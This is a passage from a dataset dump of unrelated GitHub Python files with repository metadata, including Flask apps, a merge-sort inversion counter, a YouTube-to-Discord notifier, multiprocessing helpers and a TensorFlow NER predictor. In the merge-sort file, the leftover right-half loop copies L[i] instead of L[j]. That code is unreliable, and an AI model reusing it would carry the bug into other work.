Tool.get_txtLineNum(filepath)\nlistOfLines = Tool.get_txtfile(filepath)\nfor line in listOfLines:\n\tword = line.strip()\n\tletter_list = list(word)\n\titem_dic = {}\n\titem_dic[\"word\"] = word\n\tp = 1\n\tfor l in letter_list:\n\t\tp = p * (word_dic[l] / 12593) # 359 2309 12593\n\ti = -math.log2(p) # 信息熵\n\titem_dic[\"p\"] = p\n\titem_dic[\"i\"] = i\n\tword_datas.append(item_dic)\nprint(word_datas)\n\nheader = ['word', 'p', 'i'] # 数据列名\ndatas = word_datas\n\nTool.csv_write('信息熵_allowed.csv',header=header,datas=datas)","repo_name":"ww-1009/2023MCM_C","sub_path":"python/比特.py","file_name":"比特.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"39027734715","text":"def merge(L, temp, left, mid, right):\r\n i, j, k, inv_count = left, mid + 1, left, 0\r\n while i <= mid and j <= right:\r\n if L[i] <= L[j]:\r\n temp[k] = L[i]\r\n k += 1\r\n i += 1\r\n else:\r\n temp[k] = L[j]\r\n inv_count += mid - i + 1\r\n k += 1\r\n j += 1\r\n while i <= mid:\r\n temp[k] = L[i]\r\n k += 1\r\n i += 1\r\n while j <= right:\r\n temp[k] = L[i]\r\n k += 1\r\n j += 1\r\n for i in range(left, right + 1):\r\n L[i] = temp[i]\r\n return inv_count\r\n \r\ndef mergeSort(L, temp, left, right):\r\n inv_count = 0\r\n if left < right:\r\n mid = (left + right) // 2\r\n inv_count += mergeSort(L, temp, left, mid)\r\n inv_count += mergeSort(L, temp, mid+1, right)\r\n inv_count += merge(L, temp, left, mid, right)\r\n return inv_count\r\n\r\ndef countInversions(L):\r\n N = len(L)\r\n temp = [0] * N\r\n return mergeSort(L, temp, 0, N-1)\r\n\r\nL = list(map(int, input().split()))\r\nprint(countInversions(L))","repo_name":"KARTHIKEYANC04052002/TECHDOSE-Assignments","sub_path":"Array/Counting Inversion.py","file_name":"Counting Inversion.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31829827336","text":"'''\n@Author: Pavan Nakate\n@Date: 2021-11-10 06:49\n@Last Modified by: Pavan Nakate\n@Last Modified time: None\n@Title : CountOfTrue : Print the count of True in the given dictionary \n'''\ndef true_count():\n \"\"\"\n Description:\n This Function print the count of True in the given dictionary \n Parameter:\n None\n Return:\n None\n \"\"\"\n try:\n sample_data = [{'id': 1, 'success': True, 'name': 'Lary'}, {'id': 2, 'success':False, 'name': 'Rabi'}, {'id': 3, 'success': True, 'name': 'Alex'}]\n count = 0\n for d in sample_data:\n if d['success'] == True:\n count += 1\n\n print(\"Count of value 'True' is : \",count)\n\n except Exception as e:\n print(e)\n\nif __name__ == \"__main__\":\n true_count()","repo_name":"Pavan699/Data-Structures","sub_path":"Dictionary/CountOfTrue.py","file_name":"CountOfTrue.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70722120196","text":"import logging\nfrom flask import Blueprint, request, render_template\nfrom utils import get_posts_by_user, view_bookmarks\n\nlogging.basicConfig(encoding=\"utf-8\", level=logging.INFO)\nusers_blueprint = Blueprint(\"users\", __name__)\n\n@users_blueprint.route(\"/users//\")\ndef posts_user(username):\n \"\"\"Вьюшка, которая показывает все посты определенного пользователя\"\"\"\n posts = get_posts_by_user(username)\n bookmarks = view_bookmarks()\n logging.info(f\"Запрошена страница пользователя {username}\")\n return render_template(\"user-feed.html\", posts=posts, bookmarks=bookmarks)\n\n","repo_name":"AnastasiaGoryacheva/homework26-cw2","sub_path":"PycharmProjects/coursework2/users/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2020382585","text":"def main():\r\n print(\"Welcome to Big Data Processing Application\\n\\\r\nPlease type the number that corresponds to which application you would like to run:\\n\\\r\nEnter 5 to exit:\\n\\\r\n1. Apache Hadoop\\n\\\r\n2. Apache Spark\\n\\\r\n3. Jupyter Notebook\\n\\\r\n4. SonarQube and SonarScanner\\n\")\r\n\r\n while(True):\r\n value = input(\"\")\r\n if value == \"1\":\r\n print(\"Activating Hadoop!\\n\")\r\n elif value == \"2\":\r\n print(\"Activating Spark!\\n\")\r\n elif value == \"3\":\r\n print(\"Activating Jupyter!\\n\")\r\n elif value == \"4\":\r\n print(\"Activating Sonar Stuff!\\n\")\r\n elif value == \"5\":\r\n quit()\r\n\r\nmain()","repo_name":"WalterDiong/14848-Cloud","sub_path":"Course_Project_Checkpoint_1/terminal.py","file_name":"terminal.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71102030273","text":"from AthenaConfiguration.ComponentAccumulator import ComponentAccumulator\nfrom AthenaConfiguration.ComponentFactory import CompFactory\n\n\n# Main algorithm config\ndef FTAG3KernelCfg(flags, name='FTAG3Kernel', **kwargs):\n \"\"\"Configure the derivation framework driving algorithm (kernel) for FTAG3\"\"\"\n acc = ComponentAccumulator()\n \n from DerivationFrameworkFlavourTag.FTAG1 import FTAG1KernelCfg\n acc.merge(FTAG1KernelCfg(flags, name, TriggerListsHelper = kwargs['TriggerListsHelper']))\n\n # augmentation tools\n augmentationTools = []\n\n # skimming tools\n skimmingTools = []\n # filter leptons\n lepton_skimming_expression = 'count( (Muons.pt > 5*GeV) && (0 == Muons.muonType || 1 == Muons.muonType || 4 == Muons.muonType) ) >=1'\n FTAG3LeptonSkimmingTool = CompFactory.DerivationFramework.xAODStringSkimmingTool(\n name = \"FTAG3LeptonSkimmingTool\",\n expression = lepton_skimming_expression )\n acc.addPublicTool(FTAG3LeptonSkimmingTool)\n # filter large-R jets\n UFOjets_skimming_expression = 'count( AntiKt10UFOCSSKSoftDropBeta100Zcut10Jets.pt > 150*GeV ) >= 1' \n FTAG3UFOjetsSkimmingTool = CompFactory.DerivationFramework.xAODStringSkimmingTool(\n name = \"FTAG3UFOjetsSkimmingTool\",\n expression = UFOjets_skimming_expression )\n acc.addPublicTool(FTAG3UFOjetsSkimmingTool)\n # filter single-jet triggers for data\n if not flags.Input.isMC:\n acc.merge(FTAG3TriggerSkimmingToolCfg(flags, skimmingTools))\n\n # thinning tools\n thinningTools = []\n from DerivationFrameworkInDet.InDetToolsConfig import MuonTrackParticleThinningCfg\n # Include inner detector tracks associated with muons\n FTAG3MuonTPThinningTool = acc.getPrimaryAndMerge(MuonTrackParticleThinningCfg(\n flags,\n name = \"FTAG3MuonTPThinningTool\",\n StreamName = kwargs['StreamName'],\n MuonKey = \"Muons\",\n InDetTrackParticlesKey = \"InDetTrackParticles\"))\n\n skimmingTools += [\n FTAG3UFOjetsSkimmingTool,\n FTAG3LeptonSkimmingTool,\n ]\n\n thinningTools = [\n FTAG3MuonTPThinningTool,\n ]\n\n # Finally the kernel itself\n DerivationKernel = CompFactory.DerivationFramework.DerivationKernel\n acc.addEventAlgo(DerivationKernel(name, AugmentationTools = augmentationTools, ThinningTools = thinningTools, SkimmingTools = skimmingTools))\n return acc\n\n\ndef FTAG3Cfg(flags, skimmingTools=None):\n acc = ComponentAccumulator()\n \n # Get the lists of triggers needed for trigger matching.\n # This is needed at this scope (for the slimming) and further down in the config chain\n # for actually configuring the matching, so we create it here and pass it down\n # TODO: this should ideally be called higher up to avoid it being run multiple times in a train\n from DerivationFrameworkPhys.TriggerListsHelper import TriggerListsHelper\n FTAG3TriggerListsHelper = TriggerListsHelper(flags)\n\n # the name_tag has to consistent between KernelCfg and CoreCfg\n FTAG3_name_tag = 'FTAG3'\n\n # Common augmentations\n acc.merge(FTAG3KernelCfg(flags, name= FTAG3_name_tag + \"Kernel\", StreamName = 'StreamDAOD_'+FTAG3_name_tag, TriggerListsHelper = FTAG3TriggerListsHelper))\n\n from DerivationFrameworkFlavourTag.FTAG1 import FTAG1CoreCfg\n\n extra_SmartCollections = []\n extra_AllVariables = [ \"AntiKt10LCTopoTrimmedPtFrac5SmallR20Jets\" ]\n trigger_option = 'FTAG3'\n acc.merge(FTAG1CoreCfg(flags, FTAG3_name_tag, extra_SmartCollections, extra_AllVariables, trigger_option))\n\n return acc\n\n\ndef FTAG3TriggerSkimmingToolCfg(flags, skimmingTools=None):\n \"\"\"configure the trigger skimming tool\"\"\"\n acc = ComponentAccumulator()\n\n if skimmingTools is None:\n skimmingTools = []\n \n triggers = [\n 'HLT_j150', 'HLT_j200', 'HLT_j260', 'HLT_j300', 'HLT_j320', 'HLT_j360', 'HLT_j380', 'HLT_j400', 'HLT_j420'\n ]\n\n FTAG3TrigSkimmingTool = CompFactory.DerivationFramework.TriggerSkimmingTool( name = \"FTAG3TrigSkimmingTool1\",\n TriggerListOR = triggers )\n acc.addPublicTool(FTAG3TrigSkimmingTool)\n skimmingTools += [\n FTAG3TrigSkimmingTool\n ]\n return(acc)\n\n\n","repo_name":"Yusuf-Manjra/athena","sub_path":"PhysicsAnalysis/DerivationFramework/DerivationFrameworkFlavourTag/python/FTAG3.py","file_name":"FTAG3.py","file_ext":"py","file_size_in_byte":4286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73019350914","text":"from pydantic import BaseModel\n\n\n# Java style library pydantic to marshal and unmarshal\n\nclass NewUser(BaseModel):\n name: str\n age: int\n happy: bool\n\n\nuser: NewUser = NewUser(name=\"pradeep\", age=23, happy=True)\nuserJson = user.model_dump_json(indent=4)\nprint(userJson)\n\nuserstr = '{\"name\":\"pradeep\",\"age\":23,\"happy\":true}'\nuserFstr = user.model_validate_json(userstr)\nprint(userFstr.name)\nprint(type(userFstr))\n\n","repo_name":"arrin69/advancepy","sub_path":"json/AnotherWay.py","file_name":"AnotherWay.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25652403803","text":"print(\"05 - ESTRELLAS\\n\")\n\"\"\"\nHaz que aparezca una cuadrícula de estrellas en la pantalla.\n\"\"\"\n\nimport sys\nimport pygame\n\nfrom star import Star\n\nclass Main:\n def __init__(self):\n pygame.init()\n pygame.display.set_caption(\"Estrellas\")\n \n self.screen = pygame.display.set_mode((0, 0), pygame.FULLSCREEN)\n self.screen_rect = self.screen.get_rect()\n\n self.stars = pygame.sprite.Group()\n self._create_starry_sky()\n\n\n def run_game(self):\n while True:\n self._check_events()\n\n self._update_screen()\n pygame.display.flip()\n\n\n def _check_events(self):\n for event in pygame.event.get():\n if event.type == pygame.QUIT or (\n event.type == pygame.KEYDOWN and\n event.key == pygame.K_q\n ):\n sys.exit()\n\n\n def _create_starry_sky(self):\n star = Star(self)\n star_width, star_height = star.rect.size\n\n available_space_x = self.screen_rect.width - star_width\n number_stars_x = available_space_x // (2 * star_width)\n available_space_y = self.screen_rect.height - star_height\n number_stars_y = available_space_y // (2 * star_height)\n\n for row_number in range(number_stars_y):\n for star_number in range(number_stars_x):\n self._create_star(star_number, row_number)\n\n\n def _create_star(self, star_number, row_number):\n star = Star(self)\n star_width, star_height = star.rect.size\n \n star.x = star_width + 2 * star_width * star_number\n star.rect.x = star.x\n\n star.y = star_height + 2 * star_height * row_number\n star.rect.y = star.y\n\n self.stars.add(star)\n\n\n def _update_screen(self):\n self.screen.fill((0, 0, 0))\n\n self.stars.draw(self.screen)\n\n\nif __name__ == '__main__':\n ss = Main()\n ss.run_game()","repo_name":"nlarrea/apuntes-de-python","sub_path":"EJERCICIOS/12_creating_games/05_estrellas/05_estrellas.py","file_name":"05_estrellas.py","file_ext":"py","file_size_in_byte":1906,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"16915356428","text":"# -*- coding: utf-8 -*-\n# Author: José María Jiménez Manzano\n\n## https://leimao.github.io/blog/Python-tqdm-Multiprocessing/\n## https://kirk86.github.io/2017/08/python-multiprocessing/\n\nfrom multiprocessing import Pool\n\nfrom tqdm import tqdm\n\n\ndef run_map_multiprocessing(func, argument_list, num_processes):\n pool = Pool(processes=num_processes)\n\n pool.map(func=func, iterable=argument_list)\n pool.close()\n pool.join()\n\n return\n\n\ndef run_imap_multiprocessing(func, argument_list, num_processes):\n pool = Pool(processes=num_processes)\n\n result_list_tqdm = []\n for result in tqdm(pool.imap(func=func, iterable=argument_list), total=len(argument_list)):\n result_list_tqdm.append(result)\n\n return result_list_tqdm\n\n\ndef run_imap_unordered_multiprocessing(func, argument_list, num_processes):\n pool = Pool(processes=num_processes)\n\n result_list_tqdm = []\n for result in tqdm(pool.imap_unordered(func=func, iterable=argument_list), total=len(argument_list)):\n result_list_tqdm.append(result)\n\n return result_list_tqdm\n\n\ndef run_apply_async_multiprocessing(func, argument_list, num_processes):\n pool = Pool(processes=num_processes)\n\n jobs = [\n pool.apply_async(func=func, args=(*argument,))\n if isinstance(argument, tuple)\n else pool.apply_async(func=func, args=(argument,))\n for argument in argument_list\n ]\n pool.close()\n result_list_tqdm = []\n for job in tqdm(jobs):\n result_list_tqdm.append(job.get())\n\n return result_list_tqdm\n","repo_name":"josemjm/pvgis_analytics","sub_path":"scripts/utils/multiprocessing_functions.py","file_name":"multiprocessing_functions.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"24757056195","text":"\"\"\" Series Helper mode for InluxDB\n\"\"\"\nfrom typing import Any, Text, List, Dict, Optional, Iterator, Union\nfrom datetime import datetime\n\n\nclass SeriesHelper():\n \"\"\" SeriesHelper class\n \"\"\"\n def __init__(self, series: Text, tags: Optional[List] = None) -> None:\n \"\"\" Create Helper\n \"\"\"\n self.points: List[Dict[Text, Any]] = []\n self.series: Text = series\n self.tags: List = tags or []\n\n def __iter__(self) -> Iterator:\n return iter(self.points)\n\n def add_point(self, _data_: Dict) -> None:\n \"\"\" Add single series point\n \"\"\"\n current_time = datetime.utcnow().strftime('%Y-%m-%dT%H:%M:%SZ')\n\n point_fields = {\n k: to_num(v)\n for k, v in _data_.items() if k not in self.tags\n }\n\n point_tags = {\n k: to_str(v)\n for k, v in _data_.items() if k in self.tags\n }\n\n point = {\n 'measurement': self.series,\n 'fields': point_fields,\n 'tags': point_tags,\n 'time': current_time\n }\n\n self.points.append(point)\n\n def add_points(self, _data_: List[Dict]) -> None:\n \"\"\" Add multiply series points\n \"\"\"\n for item in _data_:\n self.add_point(item)\n\n\ndef to_str(value: Union[None, str, float, int, bytes]) -> Union[str]:\n \"\"\" Return string value\n \"\"\"\n if isinstance(value, bytes):\n return value.decode() if value.isascii() else value.hex()\n\n return str(value)\n\n\ndef to_num(value: Union[None, str, float, int, bytes]) -> Union[float, int]:\n \"\"\" Return float or integer value\n \"\"\"\n if isinstance(value, (float, int)):\n return value\n\n return float(value) if '.' in to_str(value) else int(value)\n","repo_name":"hramcovdv/watcher","sub_path":"serieshelper.py","file_name":"serieshelper.py","file_ext":"py","file_size_in_byte":1758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2992927807","text":"solutions = [\n {\n \"url\": \"https://chromium.googlesource.com/chromium/src.git\",\n \"managed\": False,\n \"name\": \"src\",\n \"deps_file\": \".DEPS.git\",\n \"custom_deps\": {},\n \"custom_vars\": {\n \"checkout_nacl\": True,\n \"cros_boards\": \"amd64-generic\",\n \"checkout_lacros_sdk\": True,\n },\n },\n]\ntarget_os=[\"chromeos\"]\n","repo_name":"nickdiego/chromium-env","sub_path":".gclient","file_name":".gclient","file_ext":"gclient","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"27503298650","text":"from flask import (\n Blueprint, flash, g, redirect, render_template, request, url_for\n)\nfrom werkzeug.exceptions import abort\n\nfrom flaskr.auth import login_required\nfrom flaskr.db import get_db\n\nbp = Blueprint('blog', __name__)\n\n'''\n1. index()\n- 모든 게시물을 보여주도록 한다.\n- user 테이블과 JOIN을 걸어서 저자 정보를 출력하도록 한다.\n'''\n@bp.route('/')\ndef index():\n db = get_db()\n posts = db.execute(\n 'SELECT p.id, title, body, created, author_id, username'\n ' FROM post p JOIN user u ON p.author_id = u.id'\n ' ORDER BY created DESC'\n ).fetchall()\n return render_template('blog/index.html', posts=posts)\n\n'''\n2. login_required\n- auth에서 생성한 decorator를 사용해서 login한 경우에만 접근 가능하도록 설정\n'''\n@bp.route('/create', methods=('GET', 'POST'))\n@login_required\ndef create():\n if request.method == 'POST':\n title = request.form['title']\n body = request.form['body']\n error = None\n\n if not title:\n error = 'Title is required.'\n\n if error is not None:\n flash(error)\n else:\n db = get_db()\n db.execute(\n 'INSERT INTO post (title, body, author_id)'\n ' VALUES (?, ?, ?)',\n (title, body, g.user['id'])\n )\n db.commit()\n return redirect(url_for('blog.index'))\n\n return render_template('blog/create.html')\n\ndef get_post(id, check_author=True):\n post = get_db().execute(\n 'SELECT p.id, title, body, created, author_id, username'\n ' FROM post p JOIN user u ON p.author_id = u.id'\n ' WHERE p.id = ?',\n (id,)\n ).fetchone()\n\n '''\n 3. abort()\n - HTTP 상태코드를 반환하는 특별한 예외상황을 발생\n '''\n if post is None:\n abort(404, \"Post id {0} doesn't exist.\".format(id))\n\n '''\n 4. check_author\n - 해당 변수를 통해서 작성자 validation check 실행 여부를 확인하도록 한다.\n '''\n if check_author and post['author_id'] != g.user['id']:\n abort(403)\n\n return post\n\n'''\n5. \n- id를 입력받는 매개변수 id.\n- int:를 설정하지 않을 시 string으로 자동설정된다.\n- url_for('blog.update', id=post['id'])\n'''\n@bp.route('//update', methods=('GET', 'POST'))\n@login_required\ndef update(id):\n post = get_post(id)\n\n if request.method == 'POST':\n title = request.form['title']\n body = request.form['body']\n error = None\n\n if not title:\n error = 'Title is required.'\n\n if error is not None:\n flash(error)\n else:\n db = get_db()\n db.execute(\n 'UPDATE post SET title = ?, body = ?'\n ' WHERE id = ?',\n (title, body, id)\n )\n db.commit()\n return redirect(url_for('blog.index'))\n\n return render_template('blog/update.html', post=post)\n\n'''\n6. delete\n- POST만 지원하고 index로 redirect\n'''\n@bp.route('//delete', methods=('POST',))\n@login_required\ndef delete(id):\n get_post(id)\n db = get_db()\n db.execute('DELETE FROM post WHERE id = ?', (id,))\n db.commit()\n return redirect(url_for('blog.index'))","repo_name":"rmk1075/Flask_Tutorial","sub_path":"Tutorial/flaskr/blog.py","file_name":"blog.py","file_ext":"py","file_size_in_byte":3286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40639413372","text":"import torch\nfrom hvit.decision_block.filter_block import ImagePatchFilter\nimport torchvision\nimport torchvision.transforms as transforms\nimport matplotlib.pyplot as plt\nfrom utils.image_utils import load_jpg_image, load_png_image\n\ndef main(mode='cifar10', probabilistic=True, heuristic='contrast'):\n # Define the transformations to apply to the images\n transform = transforms.Compose([\n # Resize the image to (64, 64)\n transforms.Resize((64, 64)),\n # Convert the image to a PyTorch tensor\n transforms.ToTensor(),\n # Normalize the image with mean and standard deviation of 0.5\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\n ])\n\n # Create an instance of the ImagePatchFilter class\n filter = ImagePatchFilter(patch_size=16, top_k=128, heuristic=heuristic, probabilistic=probabilistic, prob=1, verbose=True)\n\n if mode == 'cifar10':\n # Load the CIFAR10 dataset\n dataset = torchvision.datasets.CIFAR10(root='./data', train=False, download=True, transform=transform)\n\n # Choose 5 random indices from the dataset\n rand_indices = torch.randint(0, len(dataset), (5,))\n\n # Get the corresponding images and labels\n img = []\n labels = []\n for i in range(5):\n img_i, label_i = dataset[rand_indices[i]]\n img.append(img_i)\n labels.append(label_i)\n img = torch.stack(img, dim=0)\n\n if mode == 'static':\n # Alternatively, use a static test image\n img = torch.from_numpy(load_jpg_image('data/images/dog2.jpg')).permute(2,0,1)\n img = torch.unsqueeze(img, dim=0).repeat(1, 1, 1, 1)\n\n\n # Apply the ImagePatchFilter to the images\n filtered_image = filter(img)\n\n # Display the original and filtered images for each of the 5 randomly chosen images\n for i in range(filtered_image.shape[0]):\n # Define the figure and axis objects\n fig, axs = plt.subplots(1, 2, figsize=(15, 5))\n\n # Plot the original image on the first axis\n axs[0].imshow(torchvision.utils.make_grid(img[i], nrow=1).permute(1, 2, 0))\n axs[0].set_title(\"Original Image\")\n\n # Plot the filtered image on the second axis\n axs[1].imshow(torchvision.utils.make_grid(filtered_image[i], nrow=1).permute(1, 2, 0))\n axs[1].set_title(\"Filtered Image\")\n\n # Display the plot\n plt.show()\n\nif __name__ == '__main__':\n main(mode='static', probabilistic=False, heuristic='contrast')","repo_name":"MattiaLimone/HuggingGreen","sub_path":"src/hvit/decision_block/filter_block_test_script.py","file_name":"filter_block_test_script.py","file_ext":"py","file_size_in_byte":2501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"640716551","text":"import dionysus as d\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport math\nimport sys\nimport pandas\n\n# number of homologies to computer\nhomology_dim = 3\n# max epsilon of vr complex to comopute\nmax_r = 1\n\n# plots barcodes given barcode data\ndef plot_bars(dgm, order='birth', show=False, ax=None, **bar_style):\n bar_kwargs = {'color': 'b'}\n bar_kwargs.update(bar_style)\n\n if order == 'death':\n generator = enumerate(sorted(dgm, key = lambda p: p.death))\n else:\n generator = enumerate(dgm)\n\n if ax is None:\n ax = plt.axes()\n\n for i,p in generator:\n if p.death == math.inf:\n ax.plot([p.birth, max_r], [i,i], **bar_kwargs)\n else:\n ax.plot([p.birth, p.death], [i,i], **bar_kwargs)\n ax.set_xlim([0, max_r])\n if show:\n plt.show()\n\n# generates and displays barcodes from given pointcloud\n# verbose: prints each barcode if true\n# title: sets title of the graph\ndef generate_barcode(pointcloud, verbose=False, title=''):\n # generate vr sequence\n f = d.fill_rips(pointcloud, homology_dim, max_r)\n\n # compute homologies for every vr complex in filter\n m = d.omnifield_homology_persistence(f)\n\n # generate barcode data from computed homologies and vr sequence\n dgms = d.init_diagrams(m, f, 2)\n if verbose:\n for i, dgm in enumerate(dgms):\n for pt in dgm:\n print(i, pt.birth, pt.death)\n\n # plot data\n fig, axes = plt.subplots(homology_dim)\n fig.suptitle(title)\n for i in range(homology_dim): # generate a plot for each homology group\n plot_bars(dgms[i], show = False, ax=axes[i])\n axes[i].axes.get_yaxis().set_visible(False)\n axes[i].set_title(\"Homology Group \" + str(i))\n plt.tight_layout()\n plt.show()\n return dgms\n\nif __name__ == '__main__':\n i = 1\n while i < len(sys.argv):\n # load pointcloud\n filename = sys.argv[i]\n points = np.loadtxt(filename)\n\n # set epsilion\n max_r = 1\n if(len(sys.argv) > i+1):\n max_r = float(sys.argv[i+1])\n i += 1\n generate_barcode(points, title=\"Persistant Homologies of \" + filename)\n i += 1\n\n # Code used for processing political data -- ignore for homology computation\n # data = pandas.read_csv('luc_R_no_stopwords.csv')\n # points = data.values\n # np.savetxt('luc_R_no_stopwords', points)\n # plt.scatter(points[:,0], points[:,1])\n # plt.show()\n # rep = plot_barcode(points, title=\"Persistant Homologies\")\n\n # data = pandas.read_csv('luc_D_no_stopwords.csv')\n # points = data.values\n # np.savetxt('luc_D_no_stopwords', points)\n # plt.scatter(points[:,0], points[:,1])\n # plt.show()\n # dem = plot_barcode(points, title=\"Persistant Homologies\")\n\n # data = pandas.read_csv('luc_no_stopwords_labelled.csv')\n # points = data.values\n # for point in points:\n # point[2] = float(point[2])\n # np.savetxt('luc_no_stopwords_labelled', points)\n # plt.scatter(points[:,0], points[:,1])\n # plt.show()\n # dem = plot_barcode(points, title=\"Persistant Homologies\")\n\n # print(d.bottleneck_distance(rep[0], dem[0]))\n # print(d.bottleneck_distance(rep[1], dem[1]))\n","repo_name":"LucCote/persistent_homology","sub_path":"vr_persistant_homology.py","file_name":"vr_persistant_homology.py","file_ext":"py","file_size_in_byte":3008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16454691237","text":"class Solution:\n def removeDuplicates(self, nums):\n i = 0\n while len(nums) != len(set(nums)):\n p_el = nums[i]\n for j in range(nums.count(p_el) - 1):\n nums.remove(p_el)\n i += 1\n\n return len(nums)\n","repo_name":"rohit18115/Leetcode","sub_path":"Easy questions/26/another_unoptimized.py","file_name":"another_unoptimized.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"73458378433","text":"from flask_app import app\nfrom flask import render_template, redirect, request, session, flash\nfrom flask_app.models import user, book, favorite\n\n@app.route('/home')\ndef home():\n\n if 'user_id' not in session:\n return redirect('/')\n \n user_data = {'id':session['user_id']}\n current_user = user.User.get_one(user_data)\n\n # all_favs = favorite.Favorite.get_all_favs_from_user(user_data)\n \n \n all_books = book.Book.get_all_with_user()\n\n\n return render_template('home.html', current_user=current_user, all_books=all_books)\n\n","repo_name":"AlejoFernii/Book_Club","sub_path":"flask_app/controllers/home.py","file_name":"home.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72363481155","text":"import sys\nfrom runner import run\n\ndef main():\n if len(sys.argv) != 2:\n print(\"Usage: {} \".format(sys.argv[0]))\n sys.exist(1)\n\n data = sys.argv[1]\n run(bytes.fromhex(data), True)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"efecarranza/evm-py","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3929158099","text":"# to get playlist id for a channel:\n# GET https://www.googleapis.com/youtube/v3/channels?id={config['channel_id'}&part=contentDetails&&key={config['api_key']}\n# playlist id is at [\"items\"][0][\"contentDetails\"][\"relatedPlaylists\"][\"uploads\"]\n\nimport requests\nimport yaml\nimport json\n\nwith open(\"config.yml\") as f:\n config = yaml.safe_load(f)\n\nYT_PARAMS = {\n \"key\": config[\"key\"],\n \"maxResults\": 50,\n \"part\": \"snippet\",\n \"playlistId\": config[\"playlist\"]\n}\n\ndef get_new(new_data) -> list:\n with open(\"data.json\", \"r\") as f:\n old_data = json.load(f)\n\n return [i for i in new_data[\"items\"][:5] if i not in old_data]\n\ndef get_videos():\n req = requests.get(\"https://www.googleapis.com/youtube/v3/playlistItems\", params=YT_PARAMS)\n return req.json()\n\ndef post_webhook(title, url):\n data = {\n \"content\": f\"@everyone\\nNew YouTube video out: {title} -> {url}\",\n \"username\": \"YouTube Notifications\",\n \"avatar_url\": \"https://www.logo.wine/a/logo/YouTube/YouTube-Icon-Full-Color-Logo.wine.svg\"\n }\n\n requests.post(config[\"webhook\"], json=data)\n\n print(f\"Posted Webhook: {title} - {url}\")\n\ndef save_data(data):\n with open(\"data.json\", \"w\") as f:\n json.dump(data[\"items\"], f, indent=4)\n\ndef main():\n data = get_videos()\n new = get_new(data)\n for video in new:\n post_webhook(video[\"snippet\"][\"title\"], \"https://www.youtube.com/watch?v=\" + video[\"id\"])\n save_data(data)\n\nif __name__ == \"__main__\":\n main()","repo_name":"meizuflux/youtube-webhook","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71766808515","text":"# coding=utf-8\n\"\"\"Tests for the abstract class and sensor classes.\"\"\"\nimport pytest\nfrom testfixtures import LogCapture\n\nfrom mycodo.inputs.base_input import AbstractInput\n\n\n# ----------------------------\n# AbstractInput\n# ----------------------------\ndef test_abstract_input_get_measurement_method_logs_when_not_implemented():\n \"\"\" Verify that methods that are not overwritten log as errors.\"\"\"\n with LogCapture() as log_cap:\n with pytest.raises(NotImplementedError):\n AbstractInput(None, testing=True).get_measurement()\n expected_error = ('mycodo.inputs.base_input',\n 'ERROR',\n ('AbstractInput did not overwrite the get_measurement() '\n 'method. All subclasses of the AbstractInput '\n 'class are required to overwrite this method'))\n assert expected_error in log_cap.actual()\n","repo_name":"kizniche/Mycodo","sub_path":"mycodo/tests/software_tests/test_inputs/test_abstract_input_class.py","file_name":"test_abstract_input_class.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","stars":2708,"dataset":"github-code","pt":"61"} +{"seq_id":"38572148251","text":"\"\"\"Reload and serve a saved model\"\"\"\n\nfrom pathlib import Path\nfrom tensorflow.contrib import predictor\nfrom functools import partial\nimport numpy as np\n\nLINE = '''中央纪委国家监委网站4月29日消息,日前,经中共中央批准,中央纪委国家监委对陕西省委原常委、秘书长钱引安严重违纪违法问题进行了立案审查调查。'''\n\n\ndef extract_entities(tags_array, text_line):\n text_line = text_line.strip()\n results = {'PER': [], 'LOC': [], 'ORG': []}\n begin = len(text_line)\n meet_b = False\n entity = 'O'\n for idx, tag in enumerate(np.squeeze(tags_array)):\n tag = tag.decode()\n if tag[0] == 'B' and not meet_b:\n meet_b = True\n begin = idx\n entity = tag[2:]\n elif tag[0] == 'B' and meet_b:\n results[entity].append(text_line[begin:idx])\n meet_b = False\n elif tag[0] == 'O' and meet_b:\n results[entity].append(text_line[begin:idx])\n meet_b = False\n if meet_b:\n results[entity].append(text_line[begin:])\n return results\n\n\ndef predict(pred_fn, line):\n words = [w.encode() for w in line.strip()]\n nwords = len(words)\n predictions = pred_fn({'words': [words], 